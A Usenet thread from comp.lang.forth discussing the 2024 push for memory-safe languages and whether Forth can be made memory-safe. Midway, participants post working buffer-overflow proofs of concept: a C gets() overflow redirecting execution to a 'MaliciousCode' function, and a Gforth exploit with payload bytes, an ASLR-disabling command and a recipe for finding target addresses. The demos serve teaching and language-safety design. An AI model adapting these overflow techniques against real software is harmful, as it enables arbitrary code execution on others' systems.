• push for memory safe languages -- impact on Forth

    From Krishna Myneni@21:1/5 to All on Fri Mar 1 09:54:36 2024
    I'm wondering what the CS Forth users and Forth systems developers make
    of the renewed recent push for use of memory-safe languages. Certainly
    Forth can add the type of contractual safety requirements e.g.,
    implementing bounds checking, of a "memory-safe language". Do we need to
    work on libraries for these provisions?

    Opinions?

    --
    Krishna Myneni

    --- SoupGate-Win32 v1.05
    * Origin: fsxNet Usenet Gateway (21:1/5)
  • From Krishna Myneni@21:1/5 to mhx on Fri Mar 1 10:53:57 2024
    On 3/1/24 10:37, mhx wrote:
    > What if the program writes a float to a byte location?
    >
    > Do we have to go along and make Forth type-safe then?

    We don't have to go along with anything. However, it might be useful to
    consider how we can satisfy some of the concerns. It is not possible to
    separate memory safety entirely from type safety, since an array of bytes
    doesn't have the same memory bounds as an array of floats. Nevertheless,
    index checking would be the same in both cases.

    --
    Krishna

  • From mhx@21:1/5 to All on Fri Mar 1 16:37:13 2024
    What if the program writes a float to a byte location?

    Do we have to go along and make Forth type-safe then?

    -marcel

  • From Anton Ertl@21:1/5 to Krishna Myneni on Fri Mar 1 17:38:02 2024
    Krishna Myneni <krishna.myneni@ccreweb.org> writes:
    > I'm wondering what the CS Forth users and Forth systems developers make
    > of the renewed recent push for use of memory-safe languages.

    Which "renewed recent push" do you mean?

    > Certainly
    > Forth can add the type of contractual safety requirements e.g.,
    > implementing bounds checking, of a "memory-safe language". Do we need to
    > work on libraries for these provisions?

    Some years ago I thought that we can make do by providing some kind of
    secure dialect of standard Forth (with some additional words, and an
    escape hatch to full Forth) [ertl-secure16]. But the secure dialect
    was not intended to be watertight, only protect against mistakes.

    In the meantime, I know more about the topic and think that it's
    better to produce a watertight secure dialect (with an escape hatch).
    Other people recognized that earlier and have created Forth systems
    like Oforth or Eight. My own contribution to that topic, Safe Forth
    [ertl22], is a paper design for now, but has the selling point of
    requiring neither type tagging nor static type checking.

    I have had no response to what I proposed in 2016. For my 2022
    ideas, I have had one inquiry about whether an implementation already exists.

    @InProceedings{ertl-secure16,
    author = {M. Anton Ertl},
    title = {Security},
    crossref = {euroforth16},
    pages = {82--83},
    url = {http://www.euroforth.org/ef16/papers/ertl-secure.pdf},
    video = {https://wiki.forth-ev.de/lib/exe/fetch.php/events:security.mp4},
    OPTnote = {presentation slides}
    }
    @Proceedings{euroforth16,
    title = {32nd EuroForth Conference},
    booktitle = {32nd EuroForth Conference},
    year = {2016},
    key = {EuroForth'16},
    url = {http://www.complang.tuwien.ac.at/anton/euroforth/ef16/papers/proceedings.pdf}
    }

    @InProceedings{ertl22,
    author = {M. Anton Ertl},
    title = {Memory Safety Without Tagging nor Static Type Checking},
    crossref = {euroforth22},
    pages = {5--15},
    url = {http://www.euroforth.org/ef22/papers/ertl.pdf},
    url-slides = {http://www.euroforth.org/ef22/papers/ertl-slides.pdf},
    video = {https://www.youtube.com/watch?v=pReEJinuxEI},
    OPTnote = {refereed},
    abstract = {A significant proportion of vulnerabilities are due
    to memory accesses (typically in C code) that
    memory-safe languages like Java prevent. This paper
    discusses a new approach to modifying Forth for
    memory-safety: Eliminate addresses from the data
    stack; instead, put object references on a separate
    object stack and use \code{value}-flavoured words.
    This approach avoids the complexity of static type
    checking (used in, e.g., Java and Factor), and also
    avoids the performance overhead of dynamic type
    checking for non-memory operations. This paper
    discusses the consequences of this approach on the
    language, and on performance.}
    }

    - anton
    --
    M. Anton Ertl http://www.complang.tuwien.ac.at/anton/home.html
    comp.lang.forth FAQs: http://www.complang.tuwien.ac.at/forth/faq/toc.html
    New standard: https://forth-standard.org/
    EuroForth 2023: https://euro.theforth.net/2023

  • From Anton Ertl@21:1/5 to mhx on Fri Mar 1 18:02:10 2024
    mhx@iae.nl (mhx) writes:
    > What if the program writes a float to a byte location?

    That's not a safety problem (as long as the location is big enough for
    the float), so one can design a Safe Forth variant that allows that.
    But once you are already implementing all the safety features, it's
    relatively easy to prevent that, too. Of course, if you find that
    you need that, you can add a word that does that without subverting
    memory safety.
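    A minimal C sketch of such a word, under stated assumptions: the buffer
    carries its own byte length, and the names byte_buf, store_double_at and
    load_double_at are hypothetical (not from any Forth system). A float may
    be stored at any byte offset, but only if all of its bytes fit inside the
    buffer, so the store cannot run past the end:

```c
#include <stddef.h>
#include <string.h>

/* Hypothetical byte buffer that always travels with its length. */
typedef struct {
    unsigned char *data;
    size_t len;               /* size of data in bytes */
} byte_buf;

/* Store a double at byte offset off if all of its bytes fit.
   Returns 0 on success, -1 if the store would cross the end.
   The test is written as off > len - n to avoid overflow in off + n. */
int store_double_at(byte_buf b, size_t off, double x)
{
    const size_t n = sizeof x;
    if (b.len < n || off > b.len - n)
        return -1;
    memcpy(b.data + off, &x, n);   /* memcpy: no alignment requirement */
    return 0;
}

/* Matching checked load; returns 0 on success, -1 if out of bounds. */
int load_double_at(byte_buf b, size_t off, double *out)
{
    const size_t n = sizeof *out;
    if (b.len < n || off > b.len - n)
        return -1;
    memcpy(out, b.data + off, n);
    return 0;
}
```

    memcpy is used instead of a cast to double* so that unaligned byte
    offsets are permitted without undefined behaviour.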

    > Do we have to go along and make Forth type-safe then?

    For memory safety, you certainly need a way to differentiate between
    addresses and other data. Some programming languages use type
    checkers for that, some use tagging. Safe Forth uses separate stacks.
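    A toy C model of the separate-stack idea, offered as a sketch only: it is
    not the Safe Forth design from [ertl22], and the names object, machine,
    fetch and store are hypothetical. Integers live on one stack and object
    references on another; memory is reached only through an object reference
    plus an index checked against that object's size. Since no operation turns
    an integer into an object reference, arithmetic cannot forge an address:

```c
#include <stddef.h>
#include <stdint.h>

#define STACK_DEPTH 16

/* A bounded object: the only kind of memory this toy machine exposes. */
typedef struct {
    int64_t *cells;
    size_t ncells;
} object;

/* Two separate stacks: plain integers on one, object references on the
   other. No operation converts an integer into an object reference. */
typedef struct {
    int64_t data[STACK_DEPTH];
    size_t dp;
    object *objs[STACK_DEPTH];
    size_t op;
} machine;

/* Every operation returns 0 on success or -1 on a detected error;
   on error the stacks are left unchanged. */
int push_int(machine *m, int64_t x)
{
    if (m->dp == STACK_DEPTH) return -1;      /* data stack overflow */
    m->data[m->dp++] = x;
    return 0;
}

int push_obj(machine *m, object *o)
{
    if (m->op == STACK_DEPTH) return -1;      /* object stack overflow */
    m->objs[m->op++] = o;
    return 0;
}

/* fetch: data ( i -- x ), objects ( obj -- ); x = cell i of obj. */
int fetch(machine *m)
{
    if (m->dp < 1 || m->op < 1) return -1;    /* stack underflow */
    object *o = m->objs[m->op - 1];
    int64_t i = m->data[m->dp - 1];
    if (i < 0 || (uint64_t)i >= o->ncells) return -1;   /* out of bounds */
    m->data[m->dp - 1] = o->cells[i];
    m->op--;
    return 0;
}

/* store: data ( x i -- ), objects ( obj -- ); cell i of obj = x. */
int store(machine *m)
{
    if (m->dp < 2 || m->op < 1) return -1;
    object *o = m->objs[m->op - 1];
    int64_t i = m->data[m->dp - 1];
    if (i < 0 || (uint64_t)i >= o->ncells) return -1;
    o->cells[i] = m->data[m->dp - 2];
    m->dp -= 2;
    m->op--;
    return 0;
}
```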

    - anton

  • From minforth@21:1/5 to All on Fri Mar 1 17:42:08 2024
    Forth by design is as unsafe as any assembler.
    The only way to tame it is to run it in a black box.

  • From Krishna Myneni@21:1/5 to minforth on Fri Mar 1 12:42:31 2024
    On 3/1/24 11:42, minforth wrote:
    > Forth by design is as unsafe as any assembler. The only way to tame it
    > is to run it in a black box.

    We may have an alternative, when necessary. The malleability of the
    language lends itself to interfaces that can enforce memory safety.
    Even without changes to the language itself, memory safety might be
    provided by a library, e.g., typed arrays, as long as one sticks to the
    designed interface.
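    As an illustration of the library approach, here is a hedged C sketch of
    a typed array (the names typed_array, ta_init, ta_set and ta_get are
    hypothetical). The element size is fixed when the array is created; the
    index check is the same for a byte array and a float array, and only the
    byte extent differs:

```c
#include <stddef.h>
#include <stdlib.h>
#include <string.h>

/* Hypothetical typed array: element size fixed at creation, and every
   access goes through an index check against the element count. */
typedef struct {
    size_t elem_size;   /* e.g. 1 for bytes, sizeof(double) for floats */
    size_t count;       /* number of elements */
    unsigned char *data;
} typed_array;

int ta_init(typed_array *a, size_t elem_size, size_t count)
{
    a->elem_size = elem_size;
    a->count = count;
    a->data = calloc(count, elem_size);   /* zero-filled storage */
    return a->data ? 0 : -1;
}

void ta_free(typed_array *a)
{
    free(a->data);
    a->data = NULL;
    a->count = 0;
}

/* One index check for every element type. */
static int ta_index_ok(const typed_array *a, size_t i)
{
    return i < a->count;
}

/* Copy one element from src into slot i; -1 if i is out of range. */
int ta_set(typed_array *a, size_t i, const void *src)
{
    if (!ta_index_ok(a, i)) return -1;
    memcpy(a->data + i * a->elem_size, src, a->elem_size);
    return 0;
}

/* Copy slot i into dst; -1 if i is out of range. */
int ta_get(const typed_array *a, size_t i, void *dst)
{
    if (!ta_index_ok(a, i)) return -1;
    memcpy(dst, a->data + i * a->elem_size, a->elem_size);
    return 0;
}
```

    The safety holds only as long as callers go through ta_set/ta_get and
    pass elements of the declared size, i.e., as long as one sticks to the
    interface; C itself does not enforce that.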

    --
    Krishna

  • From Krishna Myneni@21:1/5 to Anton Ertl on Fri Mar 1 12:38:59 2024
    On 3/1/24 11:38, Anton Ertl wrote:
    > Krishna Myneni <krishna.myneni@ccreweb.org> writes:
    >> I'm wondering what the CS Forth users and Forth systems developers make
    >> of the renewed recent push for use of memory-safe languages.
    >
    > Which "renewed recent push" do you mean?

    The ones that Paul Rubin mentioned.

    --
    km

  • From Paul Rubin@21:1/5 to Anton Ertl on Fri Mar 1 10:17:36 2024
    anton@mips.complang.tuwien.ac.at (Anton Ertl) writes:
    >> of the renewed recent push for use of memory-safe languages.
    > Which "renewed recent push" do you mean?

    https://www.tomshardware.com/software/security-software/white-house-urges-developers-to-avoid-c-and-c-use-memory-safe-programming-languages

    https://www.whitehouse.gov/oncd/briefing-room/2024/02/26/press-release-technical-report/

  • From minforth@21:1/5 to All on Fri Mar 1 19:46:55 2024
    IMO you would just be creating another stack language, even if it just
    looks like another Forth dialect from the outside.

    If I need a relatively safe programming language, I would use SPARK.

  • From Krishna Myneni@21:1/5 to Paul Rubin on Fri Mar 1 15:47:42 2024
    On 3/1/24 12:17, Paul Rubin wrote:
    > anton@mips.complang.tuwien.ac.at (Anton Ertl) writes:
    >>> of the renewed recent push for use of memory-safe languages.
    >> Which "renewed recent push" do you mean?
    >
    > https://www.tomshardware.com/software/security-software/white-house-urges-developers-to-avoid-c-and-c-use-memory-safe-programming-languages
    >
    > https://www.whitehouse.gov/oncd/briefing-room/2024/02/26/press-release-technical-report/

    From the second link,

    "While memory safe hardware and formal methods can be excellent
    complementary approaches to mitigating undiscovered vulnerabilities, one
    of the most impactful actions software and hardware manufacturers can
    take is adopting memory safe programming languages. They offer a way to eliminate, not just mitigate, entire bug classes. This is a remarkable opportunity for the technical community to improve the cybersecurity of
    the entire digital ecosystem."

    It sounds like there are plans to use Rust for some of the Linux kernel
    code.

    --
    KM

  • From Krishna Myneni@21:1/5 to Krishna Myneni on Fri Mar 1 23:16:53 2024
    On 3/1/24 09:54, Krishna Myneni wrote:
    > I'm wondering what the CS Forth users and Forth systems developers make
    > of the renewed recent push for use of memory-safe languages. Certainly
    > Forth can add the type of contractual safety requirements e.g.,
    > implementing bounds checking, of a "memory-safe language". Do we need to
    > work on libraries for these provisions?
    >
    > Opinions?


    I played with a simple buffer overflow attack code in C, based on an
    example I found at

    https://www.jsums.edu/nmeghanathan/files/2015/05/CSC437-Fall2013-Module-5-Buffer-Overflow-Attacks.pdf

    === begin code ===
    /*
       Demonstrate buffer overflow exploit.
       Adapted from the example at:

       https://www.jsums.edu/nmeghanathan/files/2015/05/CSC437-Fall2013-Module-5-Buffer-Overflow-Attacks.pdf

       Build with:
          gcc -m32 -o exploit_demo exploit_demo.c

       Normal run:
          printf "abcdefg" | ./exploit_demo

       Find the address of MaliciousCode() within the disassembled executable:
          objdump -S ./exploit_demo

          From the listing above, note the 4-byte address of MaliciousCode
          and put the address in the input string, from low byte to high byte.

       Exploit example: pass a string that overflows the buffer and runs
       the exploit code:
          printf "abcdefghijklmnopqrst\x96\x91\x04\x08" | ./exploit_demo

          Replace the address 0x08049196 above with the one you obtained
          from the objdump command.

       The exploit will cause MaliciousCode() to execute.
    */

    #include <stdio.h>
    #include <stdlib.h>

    /* Never called by the program itself; the exploit redirects the
       return from GetInput() here. */
    void MaliciousCode() {
        printf("This code is malicious!\n");
        printf("It will not execute normally.\n");
        exit(0);
    }

    void GetInput() {
        char buffer[8];
        /* gets() performs no bounds check: input longer than 7 characters
           writes past buffer and, given enough bytes, over the saved
           return address. */
        gets(buffer);
        // puts(buffer);
    }

    int main() {
        GetInput();
        return 0;
    }
    === end code ===

    It will be a useful exercise to work up a similar example in Forth, as a
    step to thinking about automatic hardening techniques (as opposed to
    input sanitization).

    --
    Krishna

  • From Anton Ertl@21:1/5 to Krishna Myneni on Sat Mar 2 08:04:01 2024
    Krishna Myneni <krishna.myneni@ccreweb.org> writes:
    > It will be a useful exercise to work up a similar example in Forth, as a
    > step to thinking about automatic hardening techniques (as opposed to
    > input sanitization).

    Forth does not have an inherently unbounded input word like C's
    gets(). And even typical C environments warn you when you compile
    this code; e.g., when I compile it on Debian 11, I get:

    gcc xxx.c
    |xxx.c: In function ‘GetInput’:
    |xxx.c:12:10: warning: implicit declaration of function ‘gets’; did you mean ‘fgets’? [-Wimplicit-function-declaration]
    | 12 | gets(buffer);
    | | ^~~~
    | | fgets
    |/usr/bin/ld: /tmp/ccC9Qbu7.o: in function `GetInput':
    |xxx.c:(.text+0x3b): warning: the `gets' function is dangerous and should not be used.

    So, they removed gets() from stdio.h, and added a warning to the
    linker. "man gets" tells me:

    |_Never use this function_
    |[...]
    |ISO C11 removes the specification of gets() from the C language, and
    |since version 2.16, glibc header files don't expose the function
    |declaration if the _ISOC11_SOURCE feature test macro is defined.

    And when I follow the recipe in the comments, the result is a
    segmentation fault. Things like ASLR prevent such easy ways to
    reliably perform arbitrary code execution. The attacker still might
    try to repeat the attack using one of the possible target addresses,
    and eventually the random-number generator will actually produce the
    layout that the exploit is designed for. Moreover, attackers have
    found other, less time-consuming ways to cope with ASLR. Bottom line:
    ASLR makes attacks harder, but it does not prevent them.

    Anyway, there are plenty of ways to corrupt a Forth system, e.g., by
    using MOVE in an unsafe way, or by using (the non-standard) PLACE or
    +PLACE with a target buffer that's smaller than 256 bytes (and for
    +PLACE, I would not be surprised if there are implementations around
    that even write beyond the 256-byte boundary).
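    For comparison, a C sketch of bounds-checked counterparts to PLACE and
    +PLACE, assuming the usual counted-string layout (a length byte followed
    by the characters) and a target that carries its capacity. The names
    counted_buf, place_checked and plus_place_checked are hypothetical; the
    point is that the copy is refused rather than allowed to run past the end
    of a target smaller than 256 bytes:

```c
#include <stddef.h>
#include <string.h>

/* Counted-string buffer: data[0] holds the length, data[1..] the chars. */
typedef struct {
    unsigned char *data;
    size_t cap;   /* total bytes available, including the count byte */
} counted_buf;

/* Like PLACE: store src/len as a counted string in dst.
   Returns -1 instead of exceeding dst or the 255-character limit. */
int place_checked(const char *src, size_t len, counted_buf dst)
{
    if (len > 255 || dst.cap < 1 || len > dst.cap - 1)
        return -1;
    memmove(dst.data + 1, src, len);   /* memmove: src may overlap dst */
    dst.data[0] = (unsigned char)len;
    return 0;
}

/* Like +PLACE: append src/len to the counted string already in dst. */
int plus_place_checked(const char *src, size_t len, counted_buf dst)
{
    if (dst.cap < 1)
        return -1;
    size_t cur = dst.data[0];                 /* current length */
    if (cur > dst.cap - 1)
        return -1;                            /* count byte inconsistent with capacity */
    if (len > 255 - cur || len > dst.cap - 1 - cur)
        return -1;                            /* would exceed 255 chars or the buffer */
    memmove(dst.data + 1 + cur, src, len);
    dst.data[0] = (unsigned char)(cur + len);
    return 0;
}
```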

    If you want an example, here's one that targets the Gforth version I
    am currently working with:

    : MaliciousCode ( -- )
    ." This code is malicious!" cr
    ." It will not execute normally." cr
    bye ;

    create buffer1 8 allot

    :noname buffer1 96 stdin read-line . ; execute
    bye

    When I put this into a file xploit.fs and then perform

    printf "01234567890123456789012345678901234567890123456789012345678901234567890123456789\x33\x5b\x57\x55\x55\x55\x00\x00\x68\xdc\xed\xe9\xff\x7f\x00\x00"|
    setarch `uname -m` -R gforth xploit.fs

    I get the following output:

    This code is malicious!
    It will not execute normally.

    Here the "setarch `uname -m` -R" is used to disable ASLR. Attackers
    typically have no way to run programs this way (or if they have, they
    don't need such an exploit to execute arbitrary code), but they have
    other ways to work around ASLR.

    In the example above the mistake is easy to see, but these kinds of
    mistakes still happen.

    It would be safer if we had the convention that buffers are always
    passed around with their lengths. Then we could have a defining word

    safebuffer ( u "name" -- )
    \ name execution: ( -- addr u )

    and in the code above one would write

    8 safebuffer buffer1

    :noname buffer1 stdin read-line . ; execute
    bye

    and there could not be a buffer overflow exploit.
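    The same convention can be sketched in C, as an analogue rather than a
    Forth implementation: the buffer and its length form one value, and the
    reading function takes only that value, so there is no separate length
    argument to get wrong (as the 96 was in the exploit). SAFEBUFFER, safebuf
    and read_line_safe are hypothetical names:

```c
#include <stddef.h>
#include <stdio.h>

/* Hypothetical analogue of "safebuffer": address and length travel together. */
typedef struct {
    char *addr;
    size_t len;
} safebuf;

/* SAFEBUFFER(name, n) defines n bytes of storage and a safebuf called name. */
#define SAFEBUFFER(name, n) \
    static char name##_storage[n]; \
    static const safebuf name = { name##_storage, n }

/* Read one line from f into b, storing at most b.len characters.
   Returns the number of characters stored (newline excluded), or -1 at
   end of file. The rest of an overlong line stays in the stream; it is
   never written to memory. */
long read_line_safe(safebuf b, FILE *f)
{
    size_t n = 0;
    int c = 0;
    while (n < b.len && (c = getc(f)) != EOF && c != '\n')
        b.addr[n++] = (char)c;
    if (n == 0 && c == EOF)
        return -1;
    return (long)n;
}
```

    With SAFEBUFFER(buffer1, 8), the call read_line_safe(buffer1, stdin)
    mirrors "buffer1 stdin read-line". C still lets a caller reach into the
    struct fields directly, so this is a convention, not a guarantee.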

    - anton

  • From albert@spenarnc.xs4all.nl@21:1/5 to krishna.myneni@ccreweb.org on Sat Mar 2 10:41:10 2024
    In article <urstns$1ab0f$1@dont-email.me>,
    Krishna Myneni <krishna.myneni@ccreweb.org> wrote:
    > I'm wondering what the CS Forth users and Forth systems developers make
    > of the renewed recent push for use of memory-safe languages. Certainly
    > Forth can add the type of contractual safety requirements e.g.,
    > implementing bounds checking, of a "memory-safe language". Do we need to
    > work on libraries for these provisions?
    >
    > Opinions?

    There is no way Forth can be a safe language in the sense of
    Algol/Pascal/Ada/Go. It is in the same lane as assembler/Fortran/C.
    The most that can be done is to implement a safe language on top of it,
    and that does not make a lot of sense.

    Groetjes Albert
    --
    Don't praise the day before the evening. One swallow doesn't make spring.
    You must not say "hey" before you have crossed the bridge. Don't sell the
    hide of the bear until you shot it. Better one bird in the hand than ten in
    the air. First gain is a cat purring. - the Wise from Antrim -

  • From albert@spenarnc.xs4all.nl@21:1/5 to dxforth@gmail.com on Sat Mar 2 10:47:18 2024
    In article <65e2c0f3$1@news.ausics.net>, dxf <dxforth@gmail.com> wrote:
    > On 2/03/2024 5:17 am, Paul Rubin wrote:
    >> anton@mips.complang.tuwien.ac.at (Anton Ertl) writes:
    >>>> of the renewed recent push for use of memory-safe languages.
    >>> Which "renewed recent push" do you mean?
    >>
    >> https://www.tomshardware.com/software/security-software/white-house-urges-developers-to-avoid-c-and-c-use-memory-safe-programming-languages
    >>
    >> https://www.whitehouse.gov/oncd/briefing-room/2024/02/26/press-release-technical-report/
    >
    > It's good to have an application that works as planned but how does one
    > that misbehaves translate to 'security risk' and how does 'memory-safe'
    > prevent that?
    >
    > "ONCD has the belief that better metrics enable technology providers to
    > better plan, anticipate, and mitigate vulnerabilities before they become
    > a problem."
    >
    > That may be their belief (fancy word for hope) but do they have anything
    > to back it up?


    Most Forthers have a blind spot regarding what "safe" means.
    I grew up with Algol 60. The only errors you encountered were
    array index errors and memory exhaustion. Index errors showed the array,
    the index, and a call tree. Memory exhaustion indicated that you had
    infinite recursion.
    On the other hand, FORTRAN programs showed a hex address and a dump of
    the internal registers.

    Groetjes Albert

  • From Anton Ertl@21:1/5 to Anton Ertl on Sat Mar 2 09:57:01 2024
    anton@mips.complang.tuwien.ac.at (Anton Ertl) writes:
    > printf "01234567890123456789012345678901234567890123456789012345678901234567890123456789\x33\x5b\x57\x55\x55\x55\x00\x00\x68\xdc\xed\xe9\xff\x7f\x00\x00"|
    > setarch `uname -m` -R gforth xploit.fs

    I forgot to give a recipe for the printf above:

    insert

    ' call -2 cells + 8 dump ' MaliciousCode sp@ 8 dump drop

    right before the execute, and the dumps contain the bytes you have to
    put into the printf after the 80th byte, in that order. I.e.:

    : MaliciousCode ( -- )
    ." This code is malicious!" cr
    ." It will not execute normally." cr
    bye ;

    create buffer1 8 allot

    :noname buffer1 96 stdin read-line . ;
    ' call -2 cells + 8 dump ' MaliciousCode sp@ 8 dump drop
    execute
    bye

    and run it with

    echo|setarch `uname -m` -R gforth xploit.fs

    For the particular Gforth at hand, this produces:

    7FFFE9E43160: 33 5B 57 55 55 55 00 00 - 3[WUUU..

    7FFFE9AF6FF0: 68 DC ED E9 FF 7F 00 00 - h.......

    exactly the bytes in the printf above.

    - anton

  • From Krishna Myneni@21:1/5 to Anton Ertl on Sat Mar 2 06:18:41 2024
    On 3/2/24 03:57, Anton Ertl wrote:

    Nice example. I can't reproduce it with an older version of Gforth (0.7.9_20220120), but any proof-of-concept attack is going to be Forth-system-dependent.

    Curious as to why you did not use standard ACCEPT for the illustration.

    --
    Krishna

  • From Krishna Myneni@21:1/5 to Krishna Myneni on Sat Mar 2 06:41:57 2024
    On 3/1/24 23:16, Krishna Myneni wrote:

    Here's the output from two runs of the executable, the first with no
    buffer overflow, and the second with buffer overflow.

    === begin test output ===
    $ printf "abcdefg" | ./exploit_demo

    $ printf "abcdefghijklmnopqrst\x96\x91\x04\x08" | ./exploit_demo
    This code is malicious!
    It will not execute normally.
    $
    === end test output ===

    I am using Fedora release 39, kernel version 6.7.5-200.fc39.x86_64, and
    gcc version gcc (GCC) 13.2.1 20231205 (Red Hat 13.2.1-6)

    --
    Krishna

  • From Krishna Myneni@21:1/5 to dxf on Sat Mar 2 08:35:25 2024
    On 3/2/24 00:02, dxf wrote:
    > On 2/03/2024 5:17 am, Paul Rubin wrote:
    >> anton@mips.complang.tuwien.ac.at (Anton Ertl) writes:
    >>>> of the renewed recent push for use of memory-safe languages.
    >>> Which "renewed recent push" do you mean?
    >>
    >> https://www.tomshardware.com/software/security-software/white-house-urges-developers-to-avoid-c-and-c-use-memory-safe-programming-languages
    >>
    >> https://www.whitehouse.gov/oncd/briefing-room/2024/02/26/press-release-technical-report/
    >
    > It's good to have an application that works as planned but how does one
    > that misbehaves translate to 'security risk' and how does 'memory-safe' prevent that?

    See my example in C where a buffer overflow is exploited to run code
    that would never be called during normal execution.

    Also, see Anton's example in Gforth.

    --
    Krishna

  • From Krishna Myneni@21:1/5 to minforth on Sat Mar 2 10:08:53 2024
    On 3/2/24 09:39, minforth wrote:
    > Harden these without runtime checks:
    > : RT1 2 3e recurse ;
    > : RT2 drop fdrop recurse ;

    Let's see what Python does:

    def rt1():
        return rt1()

    rt1()
    Traceback (most recent call last):
      File "<stdin>", line 1, in <module>
      File "<stdin>", line 2, in rt1
      File "<stdin>", line 2, in rt1
      File "<stdin>", line 2, in rt1
      [Previous line repeated 996 more times]
    RecursionError: maximum recursion depth exceeded

    Clearly it is doing a runtime check. Similarly one could have RECURSE in
    Forth perform a runtime check to enforce a recursion depth limit, and
    indeed this type of error is caught by several Forth systems:

    === kForth example ===
    : rt1 recurse ;
    ok
    rt1
    Line 2: VM Error(-258): Return stack corrupt
    rt1
    === end example ===

    === Gforth example ===
    : rt1 recurse ; ok
    rt1
    *the terminal*:2:1: error: Return stack overflow
    >>>rt1<<<
    === end example ===
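    A software check of this kind can be sketched in C as an explicit depth
    counter, assuming a fixed limit (MAX_DEPTH = 1000 here, matching Python's
    default recursion limit; enter_call and leave_call are hypothetical
    helpers). The check runs on every call, and the recursive function reports
    an error and unwinds instead of running off the end of the stack:

```c
#define MAX_DEPTH 1000   /* assumed limit, cf. Python's default of 1000 */

static int depth = 0;

/* Returns -1 if the limit would be exceeded, else 0.
   Every successful enter_call() must be paired with leave_call(). */
static int enter_call(void)
{
    if (depth >= MAX_DEPTH)
        return -1;
    depth++;
    return 0;
}

static void leave_call(void) { depth--; }

/* Analogue of ": rt1 recurse ;" with the check at each call. */
int rt1(void)
{
    if (enter_call() != 0)
        return -1;        /* "maximum recursion depth exceeded" */
    int r = rt1();
    leave_call();
    return r;
}
```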

    --
    Krishna

  • From minforth@21:1/5 to All on Sat Mar 2 15:39:11 2024
    Harden these without runtime checks:
    : RT1 2 3e recurse ;
    : RT2 drop fdrop recurse ;

  • From Anton Ertl@21:1/5 to minforth on Sat Mar 2 16:36:26 2024
    minforth@gmx.net (minforth) writes:
    > Harden these without runtime checks:
    > : RT1 2 3e recurse ;
    > : RT2 drop fdrop recurse ;

    Depends on what you mean by "runtime checks". Gforth does not
    compile extra code for stack depth checks, and yet:

    : RT1 2 3e recurse ; ok
    : RT2 drop fdrop recurse ; ok
    rt1
    *the terminal*:3:1: error: Floating-point stack overflow
    >>>rt1<<<
    rt2
    *the terminal*:4:1: error: Stack underflow
    >>>rt2<<<

    Here's the code for the two words:

    see-code rt1
    $7FEEF9B56C60 lit 1->1
    $7FEEF9B56C68 #2
    7FEEF97FB523: mov $00[r13],r8
    7FEEF97FB527: sub r13,$08
    7FEEF97FB52B: mov r8,$08[rbx]
    $7FEEF9B56C70 flit 1->1
    $7FEEF9B56C78 #4613937818241073152
    7FEEF97FB52F: add rbx,$20
    7FEEF97FB533: movsd [r12],xmm15
    7FEEF97FB539: movsd xmm15,-$08[rbx]
    7FEEF97FB53F: sub r12,$08
    $7FEEF9B56C80 call 1->1
    $7FEEF9B56C88 RT1
    7FEEF97FB543: mov rax,$08[rbx]
    7FEEF97FB547: sub r14,$08
    7FEEF97FB54B: add rbx,$10
    7FEEF97FB54F: mov [r14],rbx
    7FEEF97FB552: mov rbx,rax
    7FEEF97FB555: mov rax,[rbx]
    7FEEF97FB558: jmp eax
    $7FEEF9B56C90 ;s 1->1
    7FEEF97FB55A: mov rbx,[r14]
    7FEEF97FB55D: add r14,$08
    7FEEF97FB561: mov rax,[rbx]
    7FEEF97FB564: jmp eax
    ok
    see-code rt2
    $7FEEF9B56CC0 drop 1->1
    7FEEF97FB566: mov r8,$08[r13]
    7FEEF97FB56A: add r13,$08
    $7FEEF9B56CC8 fdrop 1->1
    7FEEF97FB56E: mov rax,r12
    7FEEF97FB571: lea r12,$08[r12]
    7FEEF97FB576: movsd xmm15,$08[rax]
    $7FEEF9B56CD0 call 1->1
    $7FEEF9B56CD8 RT2
    7FEEF97FB57C: mov rax,$18[rbx]
    7FEEF97FB580: sub r14,$08
    7FEEF97FB584: add rbx,$20
    7FEEF97FB588: mov [r14],rbx
    7FEEF97FB58B: mov rbx,rax
    7FEEF97FB58E: mov rax,[rbx]
    7FEEF97FB591: jmp eax
    $7FEEF9B56CE0 ;s 1->1
    7FEEF97FB593: mov rbx,[r14]
    7FEEF97FB596: add r14,$08
    7FEEF97FB59A: mov rax,[rbx]
    7FEEF97FB59D: jmp eax

    Look, Ma, no software run-time checks. It's done with the MMU
    hardware.

    - anton

  • From Anton Ertl@21:1/5 to Krishna Myneni on Sat Mar 2 16:43:10 2024
    Krishna Myneni <krishna.myneni@ccreweb.org> writes:
    > On 3/2/24 10:08, Krishna Myneni wrote:
    >> === Gforth example ===
    >> : rt1 recurse ;  ok
    >> rt1
    >> *the terminal*:2:1: error: Return stack overflow
    >> >>>rt1<<<
    >> === end example ===
    >
    >
    > To be clear, if you try to fill up the fp or data stack, as with your
    > rt1 example, kForth does give a segfault (and hence is susceptible to an
    > exploit), while Gforth still gives the same error.

    In Gforth on a Unix system, Unix produces a SIGSEGV when a stack runs
    into a guard page. The signal handler then looks at the offending
    address, and guesses that an access close to the bottom of a stack is
    an underflow of that stack, and correspondingly for accesses close to
    the top of a stack. This can be seen as follows:

    With the gforth engine with the FP stack being empty:

    fp@ 32769 - c@
    *the terminal*:3:13: error: Floating-point stack overflow
    fp@ 32769 - >>>c@<<<
    fp@ 1+ c@
    *the terminal*:4:8: error: Floating-point stack underflow
    fp@ 1+ >>>c@<<<
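    The classification step can be sketched in C under stated assumptions:
    each stack grows downward from base (empty end) toward limit (deep end),
    with inaccessible guard regions of guard bytes just beyond each end. In a
    real handler the faulting address would come from the si_addr field of
    the siginfo_t passed to an SA_SIGINFO signal handler; that plumbing is
    omitted, and the names below are hypothetical, not Gforth's own:

```c
#include <stddef.h>
#include <stdint.h>

/* Hypothetical description of one downward-growing stack. */
typedef struct {
    const char *name;
    uintptr_t limit;   /* lowest legal address (deep end) */
    uintptr_t base;    /* first address above the empty stack */
    uintptr_t guard;   /* size of each guard region in bytes */
} stack_region;

typedef enum { FAULT_UNKNOWN, FAULT_OVERFLOW, FAULT_UNDERFLOW } fault_kind;

/* Just below the deep end means overflow; just above the empty end
   means underflow. *which receives the stack name, or NULL. */
fault_kind classify_fault(const stack_region *s, size_t n,
                          uintptr_t addr, const char **which)
{
    for (size_t i = 0; i < n; i++) {
        if (addr < s[i].limit && s[i].limit - addr <= s[i].guard) {
            *which = s[i].name;
            return FAULT_OVERFLOW;
        }
        if (addr >= s[i].base && addr - s[i].base < s[i].guard) {
            *which = s[i].name;
            return FAULT_UNDERFLOW;
        }
    }
    *which = NULL;
    return FAULT_UNKNOWN;
}
```

    With an empty FP stack, fp@ 1+ lands just above base and is classified as
    an underflow, while an address far enough below fp@ to pass the deep end
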